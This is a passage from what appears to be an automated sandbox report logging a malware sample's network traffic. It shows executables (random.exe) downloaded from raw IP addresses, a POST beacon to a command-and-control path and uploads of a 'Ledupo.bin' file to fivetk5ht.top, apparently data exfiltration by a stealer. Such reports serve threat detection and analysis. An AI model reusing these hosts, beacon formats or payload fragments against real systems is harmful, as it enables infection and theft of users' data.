                                                                                                                                                                                                                                                                          Data Ascii: vn$.sz[AoiCRu\#'(U|_} 6u#|XRD]&D8~ddr&qlF'pp.Eog.*n=9_>*W}S m;W*Gsw2-KWW%q8f?$s&$4{
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:33.382615089 CET2472OUTData Raw: b9 6a c6 0b d8 15 45 66 14 c6 f1 7a cf f9 c4 43 be 00 01 ca 4f 8d 40 15 6c 52 67 03 c1 c0 82 24 59 31 aa b0 d6 aa d2 27 4b 25 92 94 1a 7b b9 9f 9c 95 b5 1f 8e 21 af 6b 01 e9 ac d6 f1 df 19 25 9c f2 1b 64 5f 96 c3 f7 c1 25 b0 5e 7e 59 37 74 d0 1b
                                                                                                                                                                                                                                                                          Data Ascii: jEfzCO@lRg$Y1'K%{!k%d_%^~Y7t,Hm85!iBxU_{G7>,:CB]F^I>nH-w&"H{YU@=#[p,{$E]S08"#F9"~F*KP@
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:33.502094984 CET14832OUTData Raw: 99 f6 30 1b c9 9b 47 3b c7 4b 31 cd 58 21 f5 6c 57 42 12 29 e9 28 47 65 9b da 86 6f f1 b9 1b 0a 35 3c 6f ad 9d 40 5d 0a 59 17 8f 7b 7a 32 0d bb 75 10 59 0d 69 48 0b 17 1e b3 0d d0 2b e9 49 82 c9 fd 91 d6 14 38 8c 60 0d 94 68 a7 d8 cc 9e b8 41 e3
                                                                                                                                                                                                                                                                          Data Ascii: 0G;K1X!lWB)(Geo5<o@]Y{z2uYiH+I8`hAi1uddse'm!?uLahh%:Hnh7Ki;l_i&DV+L7",-v<Aq}ru8$HbSh}}O4[>BJ
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:33.543749094 CET10614OUTData Raw: ed 2e 99 e3 87 f2 da 44 72 e5 b4 83 ee 36 ee 1b 18 a0 67 00 29 0a cc ba 79 93 71 54 b4 13 6c e6 cb 38 96 85 47 a6 bd 98 f0 47 7e fd 00 aa 06 00 80 05 c1 6a f2 e3 03 b4 15 a6 bb a2 5e 44 9b 24 da 19 9b 2c 97 14 3f 6a 48 05 6c 89 1f c1 17 c3 26 8c
                                                                                                                                                                                                                                                                          Data Ascii: .Dr6g)yqTl8GG~j^D$,?jHl&\N%!3_K%cX\"!saNv\tSO]J!\$Y]+.mu"}FEs7#=MqiCp;xn_4C@Cp<
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:35.026813984 CET274INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                          Date: Sat, 21 Dec 2024 00:15:34 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                                          Content-Length: 2
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          X-RateLimit-Limit: 30
                                                                                                                                                                                                                                                                          X-RateLimit-Remaining: 28
                                                                                                                                                                                                                                                                          X-RateLimit-Reset: 1734741932
                                                                                                                                                                                                                                                                          ETag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc"
                                                                                                                                                                                                                                                                          Data Raw: 4f 4b
                                                                                                                                                                                                                                                                          Data Ascii: OK


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          26192.168.2.55010531.41.244.11802672C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:34.292757034 CET62OUTGET /files/unique2/random.exe HTTP/1.1
                                                                                                                                                                                                                                                                          Host: 31.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:35.620835066 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                          Date: Sat, 21 Dec 2024 00:15:35 GMT
                                                                                                                                                                                                                                                                          Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                          Content-Length: 1950208
                                                                                                                                                                                                                                                                          Last-Modified: Fri, 20 Dec 2024 23:03:35 GMT
                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                          ETag: "6765f7c7-1dc200"
                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                          Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 97 69 b8 cb d3 08 d6 98 d3 08 d6 98 d3 08 d6 98 6e 47 40 98 d2 08 d6 98 cd 5a 52 98 ce 08 d6 98 cd 5a 43 98 c7 08 d6 98 cd 5a 55 98 b8 08 d6 98 f4 ce ad 98 d6 08 d6 98 d3 08 d7 98 a0 08 d6 98 cd 5a 5c 98 d2 08 d6 98 cd 5a 42 98 d2 08 d6 98 cd 5a 47 98 d2 08 d6 98 52 69 63 68 d3 08 d6 98 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 a8 2c b1 65 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 da 02 00 00 40 01 00 00 00 00 00 00 10 86 00 00 10 00 00 00 f0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 40 86 00 00 04 00 00 ec 23 1e 00 02 00 00 80 00 00 [TRUNCATED]
                                                                                                                                                                                                                                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$inG@ZRZCZUZ\ZBZGRichPEL,e@@@#[Ao@ @N@.rsrc@p^@.idata A@ )A@ccxjephb0k@hovzsnmn@.taggant0"@
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:35.620863914 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                          Data Ascii:
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:35.620876074 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                          Data Ascii:
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:35.621052027 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                          Data Ascii:
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:35.621062994 CET1236INData Raw: b3 e5 a9 ae ec 42 f5 c8 2b 8a b1 ee 6e e3 6d f8 71 9a 3f 84 7f 8d df e6 3f f6 17 47 ed 09 f9 a4 60 8e e9 1b 85 98 a1 dd 0e 1b 14 84 04 06 e6 74 58 88 cf 0e a8 54 ec 86 04 33 ee aa 4c bd cb d7 c5 c1 2c 92 58 2a 1d f8 d1 5b 99 fb a0 6b e6 f8 8d ac
                                                                                                                                                                                                                                                                          Data Ascii: B+nmq??G`tXT3L,X*[k<+3PC_;{O'MP0~qga=`ja2V][8`@1_.%>c~y<y-2iL*Qk_[N++FkjZ$n)'=
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:35.621073008 CET1120INData Raw: 1f 4d fd d4 18 47 23 31 6b 4c aa 8e 32 b3 d5 e0 94 46 37 04 65 57 01 ef 23 02 ab 7f 86 aa 4b 6c 3b 5b 45 fc 04 00 c3 b6 80 cd cc 8d 9e 48 33 ed ab 8a 67 78 88 eb 07 25 06 cb ba f7 5f 3f 0e ce 06 7d c9 47 83 b2 c7 c4 41 2b b4 1e 18 20 43 e6 18 76
                                                                                                                                                                                                                                                                          Data Ascii: MG#1kL2F7eW#Kl;[EH3gx%_?}GA+ CvN{*<:Bhgm~i4',\)e:}M6A c9I[IASXa.p+$iBaz0?hc(4YoMD+=
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:35.621262074 CET1236INData Raw: 56 5f 45 25 6b 25 23 7d d2 89 a2 d0 9d 82 20 cc ff c9 cc 66 b5 c8 93 b9 48 a6 a7 9b 26 a0 ae 35 6a 08 23 4b 62 98 a5 35 62 96 87 8d 48 9a b2 9a f6 92 48 ed 0d 81 83 ab 43 ea 87 2c a1 3e c1 ee 03 ad b4 04 d4 b8 ff c3 5c cb a7 63 0d 1a 01 95 8a a4
                                                                                                                                                                                                                                                                          Data Ascii: V_E%k%#} fH&5j#Kb5bHHC,>\c{dw~nSM-(1yIuKJx,j0@&CwFvuT*,E\[R@\6e2jrC5''=x7FE/F]WMfrMI
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:35.621273041 CET1236INData Raw: 59 cf d4 fe e0 6d 24 a4 3b 87 a0 cf 43 88 7f d5 2b b5 d7 1e 43 cb 36 cd 15 c3 c7 84 5d bd d6 80 eb ca 69 39 76 58 c5 b2 8a cf 62 6f 8a 9a a5 27 1b 65 fe f3 a7 8e 12 9b 70 83 d5 55 90 a1 4a 1a 61 3f 76 ea 26 98 a5 82 70 09 4c 14 ab 4f 9b f2 d0 f0
                                                                                                                                                                                                                                                                          Data Ascii: Ym$;C+C6]i9vXbo'epUJa?v&pLO$>(l39UP_E!Z[W.|)b>)0<)||B~*M&:1hEOF`E5MZV}a[~=%aW1>z@0M(;+$U=1
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:35.621283054 CET1236INData Raw: 43 bc 8f 2c 09 5d 97 42 27 74 54 34 69 99 17 8e 41 9b 4a fe 73 5c 2f 87 a6 50 0d fc d3 9b b3 3b a5 f6 43 d7 3c 87 ba fd 3b 8f 41 d7 65 d7 02 49 91 80 0c de e4 93 f7 fc a3 03 3e 93 64 1c 1a 67 b1 b9 56 87 e9 be 01 ec 25 b0 60 40 1c d7 18 d8 78 7e
                                                                                                                                                                                                                                                                          Data Ascii: C,]B'tT4iAJs\/P;C<;AeI>dgV%`@x~@UvU$j-#X-!WS*PIb\O]UC9EdYPq20n02I4pg6-7}z(FH}X/RSj%MAWLI2og{
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:35.621409893 CET1236INData Raw: ae 47 eb 16 dd 6f 45 7f e7 36 b2 f3 29 a2 2d f3 eb 1e 2b 85 d5 0f 33 e8 57 88 71 e0 ba ab 61 1a 79 7c 2d 3b be 85 6e 3f f6 c9 62 25 7b 84 a0 0a 32 ff 0b c7 e4 e1 c4 02 5e e0 27 c1 bb 8f e2 d5 17 79 67 08 d0 ac fc 24 d1 91 79 00 e5 85 46 e4 5e 19
                                                                                                                                                                                                                                                                          Data Ascii: GoE6)-+3Wqay|-;n?b%{2^'yg$yF^^r-0YoA3tD^5FPCUu'0pPa[@ eb4R'.$}Q:s{8'e@f%FQNa/JH56$
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:35.740503073 CET1236INData Raw: da 18 c7 28 fd f8 0c 9b 28 4d 25 ed d3 75 e7 e8 08 40 ac f1 06 ec 10 9e 2e db ac ef 15 ec c2 f8 68 68 47 2c d5 4d cd 05 ef 6f 42 24 89 3c b2 b5 fc 6d d1 38 11 5c 83 43 f1 7b b3 cd ce 1f f1 09 0e 6b fe bb 08 13 61 ad 2e ce fd 84 39 48 22 ac ff 9d
                                                                                                                                                                                                                                                                          Data Ascii: ((M%u@.hhG,MoB$<m8\C{ka.9H"VfIk>%B~H`s&i}7Ha'xYj4HOjQcET{5\Zrg5i.0>iXNoQEq5\ST`j4)9qo(0k-a\Ac6(Tyl/p


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          27192.168.2.550141185.215.113.43802672C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:41.598916054 CET184OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                          Host: 185.215.113.43
                                                                                                                                                                                                                                                                          Content-Length: 31
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Data Raw: 64 31 3d 31 30 31 38 39 37 36 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                                                                                                                                                                                                                          Data Ascii: d1=1018976001&unit=246122658369
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:42.955705881 CET193INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                          Date: Sat, 21 Dec 2024 00:15:42 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                          Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: 4 <c>0


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          28192.168.2.550142185.121.15.192806704C:\Users\user\AppData\Local\Temp\1018971001\ea2827841c.exe
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:41.819648027 CET12360OUTPOST /v1/upload.php HTTP/1.1
                                                                                                                                                                                                                                                                          Host: fivetk5ht.top
                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                          Content-Length: 29090
                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=------------------------RK944WB9e1sdV0EWqNmAHl
                                                                                                                                                                                                                                                                          Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 52 4b 39 34 34 57 42 39 65 31 73 64 56 30 45 57 71 4e 6d 41 48 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 4c 65 64 75 70 6f 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 52 f4 bd cb a0 24 43 2d e1 bf 7f 88 18 f0 5a a8 45 ce b6 2f 4a 2f 82 6e ce 69 e6 ae 05 03 d1 47 5e d4 a9 dc 44 01 b1 0d fe 6e 1c a1 4f a3 48 76 39 b7 a2 8d ca 3d 96 a3 63 e2 3a db 09 fd e6 8c e0 63 5d 6f 7e 96 8c d2 f6 a1 b9 e5 7e b4 05 eb fb f8 99 2b 2c 06 e7 43 cc 91 c9 56 c2 b1 af 56 c9 78 01 44 b3 26 7a 4f 24 d1 37 c6 e3 3f 6c 1b 15 18 56 82 56 27 62 bb dd c1 c4 50 7b e7 29 6f cc 4e e6 31 d3 5c f1 88 79 2b 9a 69 6a eb e5 50 cb 01 c3 01 e5 2d c3 6c 6f 0a 62 c2 7d cb ff 6e 9a eb 42 61 93 27 da b3 7b 72 a2 3b 2b 25 11 50 30 06 [TRUNCATED]
                                                                                                                                                                                                                                                                          Data Ascii: --------------------------RK944WB9e1sdV0EWqNmAHlContent-Disposition: form-data; name="file"; filename="Ledupo.bin"Content-Type: application/octet-streamR$C-ZE/J/niG^DnOHv9=c:c]o~~+,CVVxD&zO$7?lVV'bP{)oN1\y+ijP-lob}nBa'{r;+%P0<d)}ff"L*GuwXlBL6~MhH@USA56$PDfv<]!%s+q2\NWW:=Z%@+d-g62<^IdM;JG}5:9_D!JN&BzeqdD^XvY!k"v\?x<S=q@,+Ui&53RpU;2h\F[.sw3]KCyX7Ru7#VC>]sLeiqp7]\Kd+=XPI#ET,YZsg53`sH:_W@@]'0Na\2pEB1Q,w)Zlt:<)#-I=}4$L1w6M*USJ+j[-rrvCvk@>iJ<8Cy7d%"\}tsFr XI9.)Vtd?8Ea]ZwO [TRUNCATED]
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:41.939673901 CET12360OUTData Raw: 8d 3e 9e ba fb 87 1f d0 49 bc 43 b0 f0 c2 f8 28 bf 8b fb cd 0a 82 35 87 b8 68 0f 37 7a 4b ac c5 3f eb 2d 94 02 e0 73 2d 25 a5 34 e2 2d 48 51 f0 d5 76 ba f6 fd f8 b0 16 80 fa 33 20 e9 b7 e3 06 cf bd bb 12 67 c9 16 d1 ad 72 1a d9 cc 3f 3d 26 44 0c
                                                                                                                                                                                                                                                                          Data Ascii: >IC(5h7zK?-s-%4-HQv3 gr?=&D$fBd[T%`<0qr}D;74"`xW?[e#SiZE3{r ]d7,ju*uI3p^(/S;A%{EhczF:4<X&
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:41.939793110 CET4551OUTData Raw: 46 70 c4 86 05 5c 36 bf 51 c3 82 90 bb 74 64 34 ce fa ab f8 85 08 fd ba 44 3a 1b a4 47 58 fa dd 6c 63 1d 6a ab 5a 12 51 3f be 58 3b ff 4a e6 e8 70 80 5a 1b 70 67 e1 9d b2 97 c2 76 a6 83 42 56 f6 32 4c 81 72 33 c4 33 6b 45 d0 f2 8a 8d fb 94 15 91
                                                                                                                                                                                                                                                                          Data Ascii: Fp\6Qtd4D:GXlcjZQ?X;JpZpgvBV2Lr33kEz|/<*#IUh&A&YLah>Vz"9O\Y"tWZ),G4Vi"aY;q+9=tesIw[Lc(1H(&\\bj3+W)e0BHTm3
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:43.479702950 CET274INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                          Date: Sat, 21 Dec 2024 00:15:43 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                                          Content-Length: 2
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          X-RateLimit-Limit: 30
                                                                                                                                                                                                                                                                          X-RateLimit-Remaining: 27
                                                                                                                                                                                                                                                                          X-RateLimit-Reset: 1734741932
                                                                                                                                                                                                                                                                          ETag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc"
                                                                                                                                                                                                                                                                          Data Raw: 4f 4b
                                                                                                                                                                                                                                                                          Data Ascii: OK


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                          29192.168.2.550144185.215.113.1680
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:43.086107016 CET55OUTGET /luma/random.exe HTTP/1.1
                                                                                                                                                                                                                                                                          Host: 185.215.113.16
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:44.465940952 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                          Date: Sat, 21 Dec 2024 00:15:43 GMT
                                                                                                                                                                                                                                                                          Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                          Content-Length: 1825280
                                                                                                                                                                                                                                                                          Last-Modified: Fri, 20 Dec 2024 23:16:02 GMT
                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                          ETag: "6765fab2-1bda00"
                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                          Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 d1 3c 5f 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 ec 03 00 00 ae 00 00 00 00 00 00 00 60 48 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 90 48 00 00 04 00 00 5f 7b 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 54 30 05 00 68 00 00 00 00 20 05 00 ac 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 31 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                                                                          Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL<_g`H@H_{@T0h 1 H@.rsrc X@.idata 0Z@ )@\@hzobwzwi`.V^@huzxddrhPH@.taggant0`H"@
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:44.466056108 CET124INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                          Data Ascii:
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:44.466089964 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                          Data Ascii:
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:44.466126919 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                          Data Ascii:
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:44.466162920 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                          Data Ascii:
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:44.466197014 CET1236INData Raw: 56 4f e2 a1 b8 fb a6 05 eb 05 fc a4 18 48 d5 50 cf 9b 8d 85 c0 c6 1d 97 b9 5a 96 60 1d af dc 28 c0 05 05 c8 12 60 58 e8 b2 97 3e 35 f5 87 c8 09 a0 85 df 26 9a 5f 89 01 d3 c6 43 06 4f 8d 41 07 14 4c 92 3e f1 48 a2 4b e3 41 eb 07 93 98 3e 4e 82 09
                                                                                                                                                                                                                                                                          Data Ascii: VOHPZ`(`X>5&_COAL>HKA>Nqm8[Hu^HMT!gD rU&UxWq!O5tAk9x5W*MWX,:DvIYrPII(p*46#Ysj?gHC@&<?'bs(C1uSSlww5G,0
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:44.466233969 CET1236INData Raw: e5 54 66 de 21 63 5e 14 8d 49 9b 4f fb 24 4c ed 66 f2 77 d4 da d4 b9 6b 27 26 ad 35 de a5 64 e2 f5 f2 72 cd 73 ec 98 78 08 ce d7 45 b3 e2 35 09 96 bc ea 29 70 b2 f2 a9 2c 42 a4 74 0f 46 c8 a0 b7 89 5e 8e a3 72 1d 18 1b 8b 5a 10 18 d1 cb d8 c5 ab
                                                                                                                                                                                                                                                                          Data Ascii: Tf!c^IO$Lfwk'&5drsxE5)p,BtF^rZUXgD3cr7jWBBNou-b|x<oZ9Zb@yJlVId]JnkA<4'V>(^vs-Zk%;|I!w%?&*^jhnhxz!{
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:44.466367006 CET1236INData Raw: ee f9 5e 6a 97 bc 36 e1 0f c4 fd 8f a8 d5 35 16 22 90 97 25 48 24 61 85 56 c3 52 14 49 03 83 07 fb d2 1e 55 ac 49 5f 25 57 77 60 91 0f c9 fe c9 8e 0c 18 ef 99 c2 ad f4 5e 58 d8 ed 93 d8 3f 88 46 84 72 fb 4e 44 7a 8e 4c 87 59 20 43 0a 0f 0c 10 2b
                                                                                                                                                                                                                                                                          Data Ascii: ^j65"%H$aVRIUI_%Ww`^X?FrNDzLY C+]F%+T':{7lB{GVe:JU :bMoY$D9=`{-zL0?kF\vID%P6k~>~rb%Gh?&
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:44.466401100 CET1236INData Raw: 24 7a 77 f8 1a 32 22 9e a7 82 69 58 29 c7 bc 28 43 4c 95 2d 1c ca 88 24 0f 72 62 91 7b d2 fa 0e c8 6a f8 ee 91 82 8a 6e 7b 43 da 17 c3 2d 89 b7 47 12 92 9f f2 17 a7 43 85 46 ab ec 3f 4b 12 b4 5a da 9e 99 5d 61 7c 38 01 14 7f 06 fb 60 e1 79 e8 2b
                                                                                                                                                                                                                                                                          Data Ascii: $zw2"iX)(CL-$rb{jn{C-GCF?KZ]a|8`y+0z"u?Kr9bou_[caago9?Di%+i$hre0p^n/TIMGPj/8lk!(nJWG[5XXY}EG"PwRs
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:44.466435909 CET1236INData Raw: af c5 c0 fb ea fe 58 01 15 c2 c0 0d cb 28 2b e1 3b 6c f4 5c cc ee a2 cd 50 52 e5 61 23 5c 3a 97 af 56 08 4c 12 a5 a6 4c fb e2 37 16 70 2d ca 0d d5 72 45 88 04 56 f0 ef d9 70 1f a9 e6 07 9c de 85 0c 8b c0 b6 09 6c 8d 66 0b 48 21 88 56 66 95 50 11
                                                                                                                                                                                                                                                                          Data Ascii: X(+;l\PRa#\:VLL7p-rEVplfH!VfP*sKl_/X|#+1)%$-.9c(4iI/!uv>~?IUl,'RWu/GtoGoI)8J+(*+R@9'+DLgQ%A!Mu
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:44.585999966 CET1236INData Raw: 9d 0c 27 84 35 f4 d6 84 71 3f de a8 e4 95 02 de 57 e7 66 3c db 6c 7f 08 54 cb 35 3e 72 ea bb 29 76 c2 ab 5b d7 93 3e 2a ca 82 3c fa 1e 55 3f 0f bb b8 5e 2d 6d 4c d4 5c 63 5d b2 78 24 ef 56 d6 53 79 ca 69 8d 53 59 e0 1b 2d ce 09 e7 c2 65 6d 6f 53
                                                                                                                                                                                                                                                                          Data Ascii: '5q?Wf<lT5>r)v[>*<U?^-mL\c]x$VSyiSY-emoSD|B?XML:f/}Ipb.wgK>wa_RP7i-%%\Baxb$XOr*D^RiFN*WD7bo+ehj&VXmGc>grjA8Sr


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          30192.168.2.550145185.121.15.192806704C:\Users\user\AppData\Local\Temp\1018971001\ea2827841c.exe
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:44.752597094 CET196OUTPOST /zldPRFrmVFHTtKntGpOv1734579851 HTTP/1.1
                                                                                                                                                                                                                                                                          Host: home.fivetk5ht.top
                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                          Content-Type: application/json
                                                                                                                                                                                                                                                                          Content-Length: 56
                                                                                                                                                                                                                                                                          Data Raw: 7b 20 22 69 64 31 22 3a 20 22 4d 63 72 53 4d 44 45 51 6c 69 73 57 33 63 46 71 31 37 33 34 37 34 30 31 30 32 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 32 22 20 7d
